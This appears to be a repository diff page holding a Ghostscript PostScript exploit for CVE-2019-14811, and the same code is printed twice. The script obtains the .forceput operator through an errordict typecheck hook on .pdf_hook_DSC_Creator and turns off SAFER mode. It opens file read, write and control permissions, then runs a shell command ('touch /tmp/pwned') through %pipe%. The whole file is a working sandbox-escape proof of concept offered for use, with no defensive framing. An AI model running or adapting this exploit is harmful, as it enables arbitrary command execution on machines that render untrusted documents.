qqvirus · September 16, 2019 01:34
diff --git a/exp[CVE-2019-14811].ps b/exp[CVE-2019-14811].ps
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 % just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
 /exploit {
  /println  { (\\n) exch print print } bind executeonly def
  /info     { ([*] ) print println } bind executeonly def
  /success  { ([+] ) print println } bind executeonly def
  /fail     { ([-] ) print println stop } bind executeonly def
  
  /MaxFileSize 16#10000 def
  /readfile {
    (r) file
    dup MaxFileSize string readstring pop
    exch closefile
  } bind executeonly def
  
  /osexec {
    (%pipe%) exch concatstrings readfile
  } bind executeonly def
  
  (=============================================================================)
  (=                              CVE-2019-14811                               =)
  (=============================================================================)
  println println println
  
  (Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
  /.forceput null def
  systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
  /typecheckcount 0 def
  /&typecheck errordict /typecheck get def
  errordict /typecheck {
    /typecheckcount typecheckcount 1 add def
    typecheckcount 2 eq {
      1 index 2 get 8 get
      /.forceput exch store
    } if
  } put
  null .pdf_hook_DSC_Creator clear
  errordict /typecheck /&typecheck load put
  [
    /&typecheck 
    /typecheckcount
    /.pdf_hook_DSC_Creator
  ] { currentdict exch undef } forall
  (A candidate for .forceput operator found!) success
  
  (Attempting sanity check with the candidate for .forceput operator...) info
  << /overwritten false >> readonly 
  begin
    currentdict /overwritten true .forceput
    overwritten not {
      /.forceput where { /.forceput undef } if
    } if
  end
  currentdict /.forceput known not {
    (.forceput operator could not found...) fail
  } if
  (Successfully got .forceput operator!) success
  
  (Overwriting several flags to escape from Safer Mode...) info
  systemdict /SAFER false .forceput
  userparams /LockFilePermissions false .forceput
  userparams /PermitFileControl [(*)] .forceput
  userparams /PermitFileWriting [(*)] .forceput
  userparams /PermitFileReading [(*)] .forceput
  save restore
  
  SAFER { 
    (Could not escape from Safer Mode.) fail
  } bind executeonly if
  (Successfully escaped from Safer Mode!) success
  
  (Executing a shell command...) info
  (touch /tmp/pwned) osexec pop
  (PS: I pwned you <3) success
 } def
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 exploit
 quit
	%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
	% just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
	/exploit {
	/println { (\\n) exch print print } bind executeonly def
	/info { ([*] ) print println } bind executeonly def
	/success { ([+] ) print println } bind executeonly def
	/fail { ([-] ) print println stop } bind executeonly def

	/MaxFileSize 16#10000 def
	/readfile {
	(r) file
	dup MaxFileSize string readstring pop
	exch closefile
	} bind executeonly def

	/osexec {
	(%pipe%) exch concatstrings readfile
	} bind executeonly def

	(=============================================================================)
	(= CVE-2019-14811 =)
	(=============================================================================)
	println println println

	(Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
	/.forceput null def
	systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
	/typecheckcount 0 def
	/&typecheck errordict /typecheck get def
	errordict /typecheck {
	/typecheckcount typecheckcount 1 add def
	typecheckcount 2 eq {
	1 index 2 get 8 get
	/.forceput exch store
	} if
	} put
	null .pdf_hook_DSC_Creator clear
	errordict /typecheck /&typecheck load put
	[
	/&typecheck
	/typecheckcount
	/.pdf_hook_DSC_Creator
	] { currentdict exch undef } forall
	(A candidate for .forceput operator found!) success

	(Attempting sanity check with the candidate for .forceput operator...) info
	<< /overwritten false >> readonly
	begin
	currentdict /overwritten true .forceput
	overwritten not {
	/.forceput where { /.forceput undef } if
	} if
	end
	currentdict /.forceput known not {
	(.forceput operator could not found...) fail
	} if
	(Successfully got .forceput operator!) success

	(Overwriting several flags to escape from Safer Mode...) info
	systemdict /SAFER false .forceput
	userparams /LockFilePermissions false .forceput
	userparams /PermitFileControl [(*)] .forceput
	userparams /PermitFileWriting [(*)] .forceput
	userparams /PermitFileReading [(*)] .forceput
	save restore

	SAFER {
	(Could not escape from Safer Mode.) fail
	} bind executeonly if
	(Successfully escaped from Safer Mode!) success

	(Executing a shell command...) info
	(touch /tmp/pwned) osexec pop
	(PS: I pwned you <3) success
	} def
	%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
	exploit
	quit